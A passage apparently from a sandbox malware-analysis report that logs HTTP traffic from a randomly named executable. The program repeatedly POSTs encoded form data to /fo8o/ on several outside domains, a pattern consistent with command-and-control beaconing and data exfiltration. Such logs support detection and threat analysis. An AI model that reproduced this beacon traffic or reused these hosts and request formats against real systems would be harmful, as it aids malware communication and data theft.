                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.elettrosistemista.zip
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:51:06.707916021 CEST367INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:51:06 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 203
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  29192.168.2.104974023.227.38.74801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:12.185513973 CEST782OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.donnavariedades.com
                                                                                                  Origin: http://www.donnavariedades.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.donnavariedades.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 37 63 66 36 45 2f 52 6f 38 6c 6b 58 59 47 6b 64 32 64 39 50 66 45 74 4a 64 78 68
                                                                                                  Data Ascii: FBEd=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDp7cf6E/Ro8lkXYGkd2d9PfEtJdxh
                                                                                                  May 8, 2024 10:51:12.491338968 CEST1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:51:12 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Sorting-Hat-PodId: 311
                                                                                                  X-Sorting-Hat-ShopId: 87850025272
                                                                                                  Vary: Accept-Encoding
                                                                                                  x-frame-options: DENY
                                                                                                  x-shopid: 87850025272
                                                                                                  x-shardid: 311
                                                                                                  x-request-id: 9a6dc7db-0394-4880-b691-abed2da91c16-1715158272
                                                                                                  server-timing: processing;dur=32
                                                                                                  content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272
                                                                                                  x-content-type-options: nosniff
                                                                                                  x-download-options: noopen
                                                                                                  x-permitted-cross-domain-policies: none
                                                                                                  x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272
                                                                                                  x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1
                                                                                                  Content-Encoding: gzip
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNZurGMiBUjjH65nycq3vVVh8%2FaiQ%2BgU2QsjucWpF7EOlaV%2BJT8Op%2FVeQhkp6bXwWH9xT1Elgyj%2BTKfcIiXwaXnO1
                                                                                                  Data Raw:
                                                                                                  Data Ascii:
                                                                                                  May 8, 2024 10:51:12.491357088 CEST293INData Raw: 41 4e 76 61 7a 31 31 70 53 79 31 41 72 61 63 4f 44 36 44 6f 4c 67 59 57 61 35 7a 44 71 6a 71 66 79 25 32 46 36 59 52 38 67 75 64 50 79 61 6f 43 54 39 46 39 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22
                                                                                                  Data Ascii: ANvaz11pSy1AracOD6DoLgYWa5zDqjqfy%2F6YR8gudPyaoCT9F9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=140.000105Server: cloudflareCF-RAY: 8808
                                                                                                  May 8, 2024 10:51:12.491369009 CEST1289INData Raw: 36 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 93 db b6 15 7e f7 af 40 e9 e9 8c d3 e1 1d 14 29 d2 d4 ba ce da 6d 33 b3 69 33 75 66 3a ed 1b 44 42 22 b2 14 c1 82 90 b4 9b 4c fe 7b 0f 00 82 22 77 25 a7 d9 1d 5b b8 9c eb 77 2e 38 da f2 0f 9f
                                                                                                  Data Ascii: 6b9X[~@)m3i3uf:DB"L{"w%[w.8qyho9BJs;op!l ke`&9#A*I>RR${I0>/hEMEG"S5j?yYruwg}d
                                                                                                  May 8, 2024 10:51:12.491385937 CEST439INData Raw: 01 6e 70 a2 ce ee 43 1f af 81 11 23 d0 82 f3 95 65 0a fd 38 06 09 46 de c3 c2 ac e5 ee 3f 8e 4e c4 2f 3a 01 e7 a9 f8 f6 73 fe ed 67 ac 52 c4 5c e9 d6 bb 71 e2 e9 40 3d 36 3f 71 06 55 a6 a7 5b e7 ae 0c 14 0e bf 0d 12 b8 9e ad dc 78 8d ee ed ca cf
                                                                                                  Data Ascii: npC#e8F?N/:sgR\q@=6?qU[xTn0`3.!8cjmVD V U_92X/8VWHot2_+q9-$+({Tw38w_8|%mjH7A\d<2v~}0t
                                                                                                  May 8, 2024 10:51:12.491394997 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  30192.168.2.104974123.227.38.74801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:14.901375055 CEST806OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.donnavariedades.com
                                                                                                  Origin: http://www.donnavariedades.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.donnavariedades.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 59 6a 48 62 45 4c 53 51 6f 47 79 53 76 57 6e 33 4e 53 2b 47 6a 79 72 32 31 33 45 51 3d 3d
                                                                                                  Data Ascii: FBEd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoYjHbELSQoGySvWn3NS+Gjyr213EQ==
                                                                                                  May 8, 2024 10:51:15.254306078 CEST1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:51:15 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Sorting-Hat-PodId: 311
                                                                                                  X-Sorting-Hat-ShopId: 87850025272
                                                                                                  Vary: Accept-Encoding
                                                                                                  x-frame-options: DENY
                                                                                                  x-shopid: 87850025272
                                                                                                  x-shardid: 311
                                                                                                  x-request-id: 2199823c-e987-4621-a11f-a61bbf44d90c-1715158274
                                                                                                  server-timing: processing;dur=16
                                                                                                  content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274
                                                                                                  x-content-type-options: nosniff
                                                                                                  x-download-options: noopen
                                                                                                  x-permitted-cross-domain-policies: none
                                                                                                  x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274
                                                                                                  x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1
                                                                                                  Content-Encoding: gzip
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J67Qfkpny3Chmi2KspWsNPn9cvW3xVSbLp5U7FZUGZ4YTNkGZkCs%2Fi%2BlR0Dmw7MYTj1dU2jItIq69ISa5knhjWygjO0FLP0
                                                                                                  Data Raw:
                                                                                                  Data Ascii:
                                                                                                  May 8, 2024 10:51:15.254319906 CEST287INData Raw: 6a 51 31 72 79 5a 6d 56 75 77 41 42 38 77 25 32 42 50 32 5a 73 42 42 6e 38 73 76 61 50 72 4d 43 67 65 6a 53 53 6d 43 6a 54 71 6b 6c 35 64 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30
                                                                                                  Data Ascii: jQ1ryZmVuwAB8w%2BP2ZsBBn8svaPrMCgejSSmCjTqkl5d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=189.999819Server: cloudflareCF-RAY: 880834f2ab
                                                                                                  May 8, 2024 10:51:15.254333973 CEST1289INData Raw: 36 62 37 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c e8 06 dd 29 5b b6 2a a7 eb d2 6c 2b 90 6e c5 32 60 d8 de 68 89 b6 b8 c8 a2 46 d1 76 b2 a1 ff 7d 87 a4 28 4b 89 dd 6d 09 5a f3 72 ae df b9 f0 38 f9 17 ef 7e ba fe
                                                                                                  Data Ascii: 6b7X[o6~T)[*l+n2`hFv}(KmZr8~7E>PM()^ $\9{p^Ru`ok`]9nT8lA-5EZIdPt)}Fk.J*5eZ,YUKo_;=/p
                                                                                                  May 8, 2024 10:51:15.254348040 CEST437INData Raw: 89 3a bb 0e 7d bc 00 46 8c 40 0b 5e ce 2c 53 e8 c7 31 48 30 f2 6e 27 66 4d 77 bf 3b 3a 11 ef 74 02 8e 53 f1 e5 cd f2 db 1b ac 52 c4 5c e9 d6 bb 72 e2 e1 40 3d 36 7f 70 06 55 a6 a7 5b e7 2a 0f 14 0e ff 0e 12 b8 9e ce dc 78 81 ae ed ca 5f ce e7 0a
                                                                                                  Data Ascii: :}F@^,S1H0n'fMw;:tSR\r@=6pU[*x_pci~@1+Voh Y9j9zqm]0X+/MYspnc1AvrXE /`{.g>;0l omS\qJZA)"n>9xdvyya*|+t
                                                                                                  May 8, 2024 10:51:15.254511118 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  31192.168.2.104974223.227.38.74801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:17.587469101 CEST1819OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.donnavariedades.com
                                                                                                  Origin: http://www.donnavariedades.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.donnavariedades.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 52 51 43 66 4b 4b 50 48 77 58 4a 62 49 32 4a 70 45 39 55 32 30 51 38 6a 75 30 70 6e 5a 36 39 58 79 6d 39 47 30 54 47 2f 6c 75 71 78 35 5a 37 57 55 66 58 41 63 4b 64 48 72 6a 47 36 33 38 2b 63 65 2b 4b 6f 46 79 78 6f 47 72 72 36 67 54 4f 31 47 48 68 32 74 6b 6a 56 71 30 44 51 30 59 68 65 75 55 33 4e 34 6e 61 6d 53 70 6c 57 77 6e 59 76 4d 53 6e 48 54 30 45 64 4b 44 7a 65 4d 44 4b 42 42 59 4f 4b 35 34 43 65 72 78 39 37 49 4e 4c 76 59 37 37 52 4d 50 6b 4d 38 61 34 4e 71 49 66 4a 2b 4c 55 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/RQCfKKPHwXJbI2JpE9U20Q8ju0pnZ69Xym9G0TG/luqx5Z7WUfXAcKdHrjG638+ce+KoFyxoGrr6gTO1GHh2tkjVq0DQ0YheuU3N4namSplWwnYvMSnHT0EdKDzeMDKBBYOK54Cerx97INLvY77RMPkM8a4NqIfJ+LUbPdan5y6nmVg2T15O46SSiICnn9sPdrClkySxPg90+66sxn7el0a2jZuvi1pdjOQsqgIiWprkBJlhEa1NhP2yB+BpMTRyBR18Fzv6WGOTbIuhG+ryJrCevX6+5B/r1EYjdsjOp+DPmOdk1YHdGDiVrQJV743+mru6UZyOrNZMAlB4xX94+kipBN+x7gE/AGt/BI5fENeGD7+o+7v46bRgFMLa/FzFHQVJMIDffsr3Cu1vbi702qE5j31849yt7WeX8INhI/122hG1QkiQ1lKmkuQy+U9qSQy8xT1sgl/ykpBgvmapGq+bgP3mmeu/DplQkwAJ1WQFvrvlWeI8D5VDzCN4MxfuUSAwlFhYiIurNxTr8q273jZtrH0VZMnJzsEXXAaG5eQaZKzUMGJc9y5iEDSl3MbnsHlJh15b6i3+VWpPs6eusNAHYjm6OFT7GyDy1cIMXLBxNbMfz+cgbqe40q5ce394vvMr/Abq0pamNmWrR1h8L5cqzMr82RnP0lI1yTnuOyB2itpRcIFKq7N3fbLfodFTc6fe5ORoigrAuIu7PZl5hncNI3om5lssaqpxybzpy3hJDgf9C+ow+0j2/c9kNSFNVPqU+C1CLLtZEbPSeRu9d8RKNOuFqBAT9RGd3WJHQRIHaGnh5XIKMoQe9NJVvd/g0IeN2 [TRUNCATED]
                                                                                                  May 8, 2024 10:51:17.870626926 CEST1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:51:17 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Sorting-Hat-PodId: 311
                                                                                                  X-Sorting-Hat-ShopId: 87850025272
                                                                                                  Vary: Accept-Encoding
                                                                                                  x-frame-options: DENY
                                                                                                  x-shopid: 87850025272
                                                                                                  x-shardid: 311
                                                                                                  x-request-id: 8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277
                                                                                                  server-timing: processing;dur=14
                                                                                                  content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277
                                                                                                  x-content-type-options: nosniff
                                                                                                  x-download-options: noopen
                                                                                                  x-permitted-cross-domain-policies: none
                                                                                                  x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277
                                                                                                  x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1
                                                                                                  Content-Encoding: gzip
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPR7RGy7y0bvam6EnVKHqf1Xt1cFB5B79uPSZxcF4K%2B7HxOfcDKyxBWWzw4llHMJ36NBLAlqjS%2Bk%2BHCrxwN0RBzUDESnB
                                                                                                  Data Raw:
                                                                                                  Data Ascii:
                                                                                                  May 8, 2024 10:51:17.870637894 CEST287INData Raw: 61 65 53 64 33 61 63 42 49 50 30 75 6c 6c 6c 56 38 37 43 44 55 75 59 64 59 49 6e 70 32 45 6e 56 66 6f 64 38 73 72 59 69 61 72 31 65 6b 4c 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30
                                                                                                  Data Ascii: aeSd3acBIP0ulllV87CDUuYdYInp2EnVfod8srYiar1ekL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=118.999958Server: cloudflareCF-RAY: 880835037e
                                                                                                  May 8, 2024 10:51:17.870645046 CEST1289INData Raw: 36 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 e9 6f db 36 14 ff de bf 82 53 31 a0 1b 74 53 96 6c 55 4e d7 a5 dd 01 64 07 d6 01 c3 f6 8d 96 68 8b 8b 2c 6a 14 6d 27 1b f6 bf ef 91 14 65 29 b1 bb 2d 41 6b 1e ef fc bd 83 cf 29 3e 79 f7 c3 ed cf
                                                                                                  Data Ascii: 6b5Xo6S1tSlUNdh,jm'e)-Ak)>yr(jH[;u%=5=k B2k^rA,-9MC2ZkG--=}H>v@+} _hEEEF{"vUTkwj?x=Sruw'g
                                                                                                  May 8, 2024 10:51:17.870656967 CEST435INData Raw: ea ec 36 f4 f1 12 18 31 02 2d 78 b5 b0 4c a1 1f c7 20 c1 c8 bb 9b 99 35 df fd e6 e8 44 fc a0 13 70 9a 8a 2f df af be 7c 8f 55 8a 98 2b dd 7a d7 4e 3c 1e a8 c7 e6 77 ce a0 ca f4 74 eb dc 14 81 c2 e1 df 41 02 d7 b3 85 1b 2f d1 ad 5d f9 ab 34 55 f8
                                                                                                  Data Ascii: 61-xL 5Dp/|U+zN<wtA/]4ULb=Xa@'2@wb`0H|45gQ)1ce~tXK/H\<pLb{|LU{7sWJ&tdYF#cS_ z
                                                                                                  May 8, 2024 10:51:17.870667934 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  32192.168.2.104974323.227.38.74801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:21.600831985 CEST505OUTGET /fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.donnavariedades.com
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:51:21.806546926 CEST1289INHTTP/1.1 301 Moved Permanently
                                                                                                  Date: Wed, 08 May 2024 08:51:21 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Sorting-Hat-PodId: 311
                                                                                                  X-Sorting-Hat-ShopId: 87850025272
                                                                                                  X-Storefront-Renderer-Rendered: 1
                                                                                                  location: https://donnavariedades.com/fo8o?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch
                                                                                                  x-redirect-reason: https_required
                                                                                                  x-frame-options: DENY
                                                                                                  content-security-policy: frame-ancestors 'none';
                                                                                                  x-shopid: 87850025272
                                                                                                  x-shardid: 311
                                                                                                  vary: Accept
                                                                                                  powered-by: Shopify
                                                                                                  server-timing: processing;dur=11, db;dur=3, asn;desc="212238", edge;desc="SEA", country;desc="US", pageType;desc="404", servedBy;desc="h9bp", requestID;desc="eddbe698-feaa-4bd3-bcc2-dae39c8f1a61-1715158281"
                                                                                                  x-dc: gcp-us-west1,gcp-us-west1,gcp-us-west1
                                                                                                  x-request-id: eddbe698-feaa-4bd3-bcc2-dae39c8f1a61-1715158281
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WodDAblzoa0DTh1YicLTqcIHI5RNLkfuCWkjDglBdLfsFWHVg3HRja54UKhZKPJSukL4cREcFhnoazW9mrn65UoX1RqRs6xxwdvjRCoXpMR4oHmgqJ8OdbpMqJCgdxKrPndxauMnliRZ"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                  Serv
                                                                                                  Data Raw:
                                                                                                  Data Ascii:
                                                                                                  May 8, 2024 10:51:21.806560040 CEST260INData Raw: 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 33 39 2e 30 30 30 30 33 34 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 58 2d 43 6f 6e 74
                                                                                                  Data Ascii: r-Timing: cfRequestDuration;dur=39.000034X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8808351c8bb57577-SEAalt-svc: h3=":4
                                                                                                  May 8, 2024 10:51:21.806575060 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  33192.168.2.104974434.111.148.214801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:28.280359983 CEST758OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.660danm.top
                                                                                                  Origin: http://www.660danm.top
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.660danm.top/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
